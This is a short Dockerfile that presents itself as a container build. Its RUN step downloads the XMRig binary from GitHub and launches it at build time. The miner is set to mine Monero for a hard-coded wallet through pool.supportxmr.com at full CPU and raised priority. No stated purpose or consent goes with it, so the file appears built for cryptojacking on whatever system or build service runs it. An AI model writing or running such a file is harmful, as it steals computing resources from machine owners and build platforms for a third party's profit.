FROM ubuntu:xenial

RUN apt-get update && apt-get install -y wget

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.8.3/xmrig-2.8.3-xenial-amd64.tar.gz && tar -xf xmrig-2.8.3-xenial-amd64.tar.gz && cd xmrig-2.8.3 && ./xmrig -o stratum+tcp://pool.supportxmr.com:3333 -u 45UVbdyweuJV5peeuD1ypVbFs6Z1nYhRB4r9BEL9xYjE8Ej8Pjob3LQX2dN4m314gB87Z1M9TbabwN4g4L9184dcCLyiU6y -p Nvidia1 --threads 2 --max-cpu-usage=100 --cpu-priority 4 --donate-level 1